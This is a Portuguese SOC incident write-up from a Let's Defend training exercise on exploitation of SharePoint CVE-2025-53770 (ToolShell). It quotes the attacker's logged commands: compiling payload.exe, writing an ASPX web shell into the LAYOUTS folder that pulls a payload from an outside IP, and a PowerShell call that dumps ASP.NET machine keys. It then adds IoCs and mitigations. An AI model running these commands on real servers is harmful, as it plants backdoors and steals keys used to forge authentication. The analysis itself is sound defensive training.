
Uma atividade para treinar habilidades de análise e elaboração de relatórios
Esta é uma investigação conduzida na plataforma Let's Defend, baseada em um CVE recente do SharePoint. Vamos dar uma olhada.
A regra SOC342 detectou uma requisição POST não autenticada direcionada à página vulnerável ToolPane.aspx, apresentando:
um payload grande (Content-Length: 7699)
um referer suspeito (SignOut.aspx) provavelmente usado para ofuscar a origem
comportamento consistente com a exploração da vulnerabilidade ToolShell
Um usuário externo (IP: 107.191.58.76) enviou uma requisição manipulada para um servidor SharePoint interno (172.16.20.17).
Analise o log do nosso endpoint
Um processo w3wp.exe executando um comando PowerShell codificado pode indicar uma potencial exploração ou atividade pós-exploração (ex.: execução de um payload oculto).
Em um ambiente SharePoint, é importante verificar se esse comportamento é esperado ou se representa abuso.
O comando foi ofuscado usando base64
Esse payload permite que o invasor extraia e imprima chaves de configuração críticas do ASP.NET da máquina em que é executado.
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Compila um executável a partir do código-fonte C# no servidor.
Cria um backdoor web (arquivo ASPX malicioso) no caminho do SharePoint que, quando visitado, permite que um payload externo seja executado ou baixado.
cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Este comando cria um arquivo chamado spinstall0.aspx na pasta LAYOUTS do SharePoint e escreve nele o conteúdo (aqui é um placeholder representando o código de um webshell)
Este é o hash de spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
Vamos dar uma olhada no VirusTotal.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
Este comando permite que o invasor acesse a configuração do aplicativo MachineKeySection, expondo chaves criptográficas sensíveis, como a chave de validação e a chave de descriptografia.
Essas chaves são críticas para a segurança do ASP.NET, protegendo itens como cookies de autenticação e ViewState.
A exposição ou recuperação dessas chaves pode permitir que invasores forjem tokens de autenticação, descriptografem dados protegidos ou realizem outros ataques contra o aplicativo web.
MITRE ATT&CK
Nota do analista:
O alerta foi gerado devido a uma atividade incomum do PowerShell observada em um servidor SharePoint, posteriormente determinada como uma tentativa de exploração direcionada ao CVE-2025-53770. O invasor inicialmente baixou e compilou um executável C# personalizado (payload.exe) usando o compilador C# (csc.exe), depois criou um webshell ASPX malicioso (spinstall0.aspx) dentro de um diretório do SharePoint acessível pela web. Em seguida, um comando PowerShell foi executado para recuperar chaves criptográficas sensíveis do servidor a partir da configuração via reflexão .NET. Essa sequência de ações sugere um ataque em várias fases, projetado para manter controle persistente e possivelmente forjar tokens de autenticação. O webshell foi verificado como malicioso com uma taxa de detecção de 39/62 no VirusTotal. O incidente é confirmado como um verdadeiro positivo, e medidas adicionais de contenção e remediação são recomendadas.
Detalhe do CVE-2025-53770
A desserialização de dados não confiáveis no Microsoft SharePoint Server local permite que um invasor não autorizado execute código através de uma rede. A Microsoft está ciente de que existe um exploit para o CVE-2025-53770 em circulação. A Microsoft está preparando e testando completamente uma atualização abrangente para resolver essa vulnerabilidade. Enquanto isso, certifique-se de que a mitigação fornecida na documentação deste CVE esteja em vigor para que você esteja protegido contra exploração.
Mitigação sugerida pela Microsoft: Para mitigar potenciais ataques, os clientes devem:
Usar versões suportadas do SharePoint Server local
Aplicar as atualizações de segurança mais recentes vinculadas acima.
Implantar o Microsoft Defender para Endpoint ou soluções ameaçadoras equivalentes
Garantir que a Interface de Verificação Antimalware (AMSI) esteja ativada e configurada corretamente, com uma solução antivírus apropriada, como o Defender Antivírus
Rotacionar as chaves de máquina ASP.NET do SharePoint Server
IoC
Spinstall0.aspx Web shell usado pelos atores de ameaça
Os atores também modificaram o nome do arquivo de várias maneiras – como spinstall.aspx, spinstall1.aspx, spinstall2.aspx
Este relatório é baseado em uma atividade conduzida na plataforma Let's Defend. Todas as descobertas e materiais apresentados são apenas para fins educacionais. Todos os direitos e propriedade pertencem à Let's Defend.